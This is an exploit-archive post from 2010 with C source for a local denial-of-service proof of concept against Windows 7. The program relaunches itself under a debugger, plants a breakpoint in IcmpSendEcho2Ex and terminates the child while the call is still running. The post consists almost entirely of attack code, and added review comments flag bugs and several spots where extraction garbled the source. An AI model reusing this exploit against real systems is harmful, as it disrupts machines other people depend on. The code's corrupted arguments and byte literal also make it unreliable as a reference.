
Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service

Posted on 21 August 2010

==================================================================
Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service
==================================================================

/*
Microsoft Windows DoS (IcmpSendEcho2Ex interrupting)

Author: l3D
Sites: http://nullbyte.org.il, http://forums.hacking.org.il
IRC: irc://irc.nix.co.il/#security
Email: pupipup33@gmail.com

Tested on Windows 7

Microsoft Windows operating system is prone to a local DoS by interrupting the function IcmpSendEcho2Ex.
The IP address argument should be a non-existent IP address on the net, so the function will wait a longer time.
*/
#include <stdio.h>
#include <windows.h>
#include <iphlpapi.h>
#include <winsock2.h>

#pragma comment(lib, "iphlpapi.lib")
#pragma comment(lib, "ws2_32.lib")

/* Marker placed in ExceptionInformation[0] of the debuggee's synthetic
 * breakpoint so the debugger half can tell it apart from other breakpoints. */
#define PARAM 0xDEADBEEF

/*
 * Helper-thread body: sleep 150 ms, then kill the debuggee with exit code -1.
 * Started from the debugger loop via CreateThread with the debuggee's process
 * handle as the thread parameter.
 * NOTE(review): the signature does not match LPTHREAD_START_ROUTINE
 * (DWORD WINAPI fn(LPVOID)); the (void *) cast at the CreateThread call hides
 * that mismatch.
 */
void Terminate(HANDLE hProcess){
    Sleep(150);
    TerminateProcess(hProcess, -1);
}

/*
 * Entry point. The same binary runs in two roles, selected by IsDebuggerPresent():
 *  - debuggee (launched under a debugger): resolves the ICMP exports from
 *    iphlpapi.dll, raises a marker breakpoint carrying PARAM and the address of
 *    IcmpSendEcho2Ex so the parent can locate the function, then calls
 *    IcmpSendEcho against argv[1].
 *  - debugger (first launch): re-launches its own image on argv[1] with
 *    DEBUG_PROCESS, waits for the marker breakpoint, plants a one-byte
 *    breakpoint at IcmpSendEcho2Ex in the child, and when that breakpoint fires
 *    restores the byte, rewinds the child's EIP and terminates the child from
 *    a helper thread while the call is still in progress.
 * Observable side effects of the debugger role: a process spawning its own
 * image with DEBUG_PROCESS, WriteProcessMemory into the child's code pages,
 * SetThreadContext on the child, and TerminateProcess of the child.
 * argv[1]: target IP address string, parsed with inet_addr().
 * Returns 0 on normal completion, 1 on any setup failure.
 * Uses CONTEXT.Eip, so this is x86-only code.
 */
int main(int argc, char **argv){
    if( argc<2){
        /* No trailing newline in the usage string (kept as in the original). */
        printf("Usage: %s <ip address> ", argv[0]);
        return 1;
    }

    /* ---- debuggee role ---- */
    if( IsDebuggerPresent()){
        HANDLE iphlpapi=LoadLibrary("iphlpapi.dll");
        if( !iphlpapi){
            /* NOTE(review): perror() reports errno, which Win32 API failures do
             * not set; GetLastError() holds the actual failure code. Same for
             * the other perror() calls below. */
            perror("iphlpapi.dll");
            return 1;
        }
        /* Resolved dynamically instead of linking the prototypes from iphlpapi.h. */
        FARPROC IcmpSendEcho=GetProcAddress(iphlpapi, "IcmpSendEcho");
        FARPROC IcmpCreateFile=GetProcAddress(iphlpapi, "IcmpCreateFile");
        FARPROC IcmpCloseHandle=GetProcAddress(iphlpapi, "IcmpCloseHandle");
        if( (IcmpSendEcho && IcmpCreateFile && IcmpCloseHandle)==0){
            perror("icmp functions");
            return 1;
        }
        unsigned long ipaddr=INADDR_NONE, params[2];
        HANDLE hIcmpFile;
        char data[32], *reply;
        /* Reply buffer must hold one ICMP_ECHO_REPLY plus the echoed payload. */
        int replySize=sizeof(ICMP_ECHO_REPLY)+sizeof(data);
        if( (ipaddr=inet_addr(argv[1]))==INADDR_NONE){
            perror("Illegal IP address!");
            return 1;
        }
        if( (hIcmpFile=(HANDLE)IcmpCreateFile())==INVALID_HANDLE_VALUE){
            perror("IcmpCreateFile");
            return 1;
        }
        /* NOTE(review): malloc result is not checked and is never freed. */
        reply=(char *)malloc(replySize);
        ZeroMemory(data, sizeof(data));
        /* Hand the parent the marker and the IcmpSendEcho2Ex address through
         * the exception's parameter array. NOTE(review): a pointer truncated
         * to unsigned long is only lossless on 32-bit builds. */
        params[0]=PARAM;
        params[1]=(unsigned long)GetProcAddress(iphlpapi, "IcmpSendEcho2Ex");
        RaiseException(EXCEPTION_BREAKPOINT, 0, 2, params);
        puts("Exception raised!");
        /* 1000 ms timeout; the parent is expected to stop the process inside
         * this call, so the following puts() is not expected to run. */
        IcmpSendEcho(hIcmpFile, ipaddr, data, sizeof(data), NULL, reply, replySize, 1000);
        puts("This line should never be shown...");
        IcmpCloseHandle(hIcmpFile);
        return 0;
    }

    /* ---- debugger role ---- */
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    HANDLE hProcess, hThread;
    DEBUG_EVENT debugEvent;
    /* Alias into debugEvent; valid only while debugEvent holds an exception event. */
    EXCEPTION_RECORD *ExceptionRecord=&debugEvent.u.Exception.ExceptionRecord;
    CONTEXT context;
    FARPROC IcmpSendEcho2Ex=NULL;
    /* originalByte holds the single code byte displaced by the breakpoint. */
    char path[256], args[512], originalByte[1];
    /* NOTE(review): the first argument was lost in extraction ('?'); the only
     * PROCESS_INFORMATION in scope is pi — verify against the original source. */
    ZeroMemory(?, sizeof(PROCESS_INFORMATION));
    ZeroMemory(&si, sizeof(STARTUPINFO));
    ZeroMemory(&debugEvent, sizeof(DEBUG_EVENT));
    ZeroMemory(&context, sizeof(CONTEXT));
    ZeroMemory(path, sizeof(path));
    ZeroMemory(args, sizeof(args));
    si.cb=sizeof(STARTUPINFO);
    si.dwFlags=STARTF_USESHOWWINDOW;
    si.wShowWindow=SW_HIDE;        /* child window hidden */
    context.ContextFlags=CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS;
    /* Command line for the child: "<own image path> <argv[1]>". args is a
     * writable buffer, as CreateProcess requires for lpCommandLine. */
    GetModuleFileName(NULL, path, sizeof(path)-1);
    snprintf(args, sizeof(args)-1, "%s %s", path, argv[1]);
    /* NOTE(review): the last argument was lost in extraction ('?'); it is the
     * PROCESS_INFORMATION out-parameter — verify against the original source. */
    if( !CreateProcess( NULL, args, NULL, NULL, FALSE, DEBUG_PROCESS, NULL, NULL, &si, ? )){
        perror("CreateProcess");
        return 1;
    }
    if( (hProcess=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pi.dwProcessId))==NULL){
        perror("OpenProcess");
        return 1;
    }
    HANDLE kernel32=LoadLibrary("kernel32.dll");
    FARPROC DebugSetProcessKillOnExit=GetProcAddress(kernel32, "DebugSetProcessKillOnExit");
    FARPROC DebugActiveProcessStop=GetProcAddress(kernel32, "DebugActiveProcessStop");
    FARPROC OpenThread=GetProcAddress(kernel32, "OpenThread");
    /* NOTE(review): a LoadLibrary handle is released with FreeLibrary, not
     * CloseHandle. */
    CloseHandle(kernel32);
    /* Child is killed automatically if this debugger process exits. */
    DebugSetProcessKillOnExit(TRUE);

    /* Debug-event loop; ends when the child reports EXIT_PROCESS_DEBUG_EVENT
     * or WaitForDebugEvent fails. */
    while(WaitForDebugEvent(&debugEvent, INFINITE) && debugEvent.dwDebugEventCode!=EXIT_PROCESS_DEBUG_EVENT){
        if( debugEvent.dwDebugEventCode==EXCEPTION_DEBUG_EVENT && ExceptionRecord->ExceptionCode==EXCEPTION_BREAKPOINT){
            if( ExceptionRecord->NumberParameters>1 && ExceptionRecord->ExceptionInformation[0]==PARAM){
                /* Marker breakpoint from the child: learn where IcmpSendEcho2Ex
                 * lives and plant a breakpoint there. */
                IcmpSendEcho2Ex=(FARPROC)ExceptionRecord->ExceptionInformation[1];
                printf("IcmpSendEcho2Ex %p ", IcmpSendEcho2Ex);
                /* NOTE(review): BreakpointSet is defined below main with no
                 * prototype (implicit declaration), and &originalByte has type
                 * char (*)[1], not char *. */
                if( !BreakpointSet(hProcess, IcmpSendEcho2Ex, &originalByte)){
                    perror("BreakpointSet");
                    break;
                }
            } else if( ExceptionRecord->ExceptionAddress==IcmpSendEcho2Ex){
                /* Planted breakpoint hit: put the original byte back, step the
                 * child's EIP back over the one-byte breakpoint so the original
                 * instruction re-executes, then schedule termination. */
                printf("EIP %p ", IcmpSendEcho2Ex);
                if( !BreakpointRetrieve(hProcess, IcmpSendEcho2Ex, &originalByte)){
                    perror("BreakpointRetrieve");
                    break;
                }
                /* NOTE(review): failures below are only printed; the code goes
                 * on using hThread/context regardless. */
                if((hThread=(HANDLE)OpenThread(THREAD_ALL_ACCESS, FALSE, debugEvent.dwThreadId))==NULL)
                    puts("OpenThread");
                if(!GetThreadContext(hThread, &context))
                    puts("GetThreadContext");
                context.Eip -= 1;
                if(!SetThreadContext(hThread, &context))
                    puts("SetThreadContext");
                /* Terminate() sleeps 150 ms before killing the child; the
                 * thread handle returned here is discarded. */
                CreateThread(NULL, 0, (void *)Terminate, hProcess, 0, NULL);
            }
        } else if( debugEvent.dwDebugEventCode==EXCEPTION_DEBUG_EVENT){
            /* Any other exception in the child: detach and stop debugging. */
            puts("Exception!");
            DebugActiveProcessStop(debugEvent.dwProcessId);
            break;
        }
        /* Resume the child, reporting the event as handled. */
        ContinueDebugEvent(debugEvent.dwProcessId, debugEvent.dwThreadId, DBG_CONTINUE);
        ZeroMemory(&debugEvent, sizeof(DEBUG_EVENT));
    }
    return 0;
}

/*
 * Write a one-byte breakpoint at addr in hProcess, saving the displaced byte
 * into *originalByte. Makes the page writable, reads the original byte, writes
 * the breakpoint byte, and restores the previous protection.
 * Returns TRUE only if all four calls succeed. Because the steps are chained
 * with &&, a failure in the middle leaves the page protection unrestored.
 * NOTE(review): the string literal written here looks mangled by extraction
 * (it is not a single-byte opcode as shown) — verify against the original.
 */
BOOL BreakpointSet(HANDLE hProcess, void *addr, char *originalByte){
    unsigned long oldProtect;
    if( VirtualProtectEx(hProcess, addr, 1, PAGE_EXECUTE_READWRITE, &oldProtect)
        && ReadProcessMemory(hProcess, addr, originalByte, 1, NULL)
        && WriteProcessMemory(hProcess, addr, "xCC", 1, NULL)
        && VirtualProtectEx(hProcess, addr, 1, oldProtect, &oldProtect))
        return TRUE;
    else
        return FALSE;
}

/*
 * Undo BreakpointSet: write the saved byte back to addr in hProcess.
 * Same protect / write / restore-protection sequence as BreakpointSet, and the
 * same caveat: a failed write leaves the page protection unrestored.
 * Returns TRUE only if all three calls succeed.
 */
BOOL BreakpointRetrieve(HANDLE hProcess, void *addr, char *originalByte){
    unsigned long oldProtect;
    if( VirtualProtectEx(hProcess, addr, 1, PAGE_EXECUTE_READWRITE, &oldProtect)
        && WriteProcessMemory(hProcess, addr, originalByte, 1, NULL)
        && VirtualProtectEx(hProcess, addr, 1, oldProtect, &oldProtect))
        return TRUE;
    else
        return FALSE;
}

 
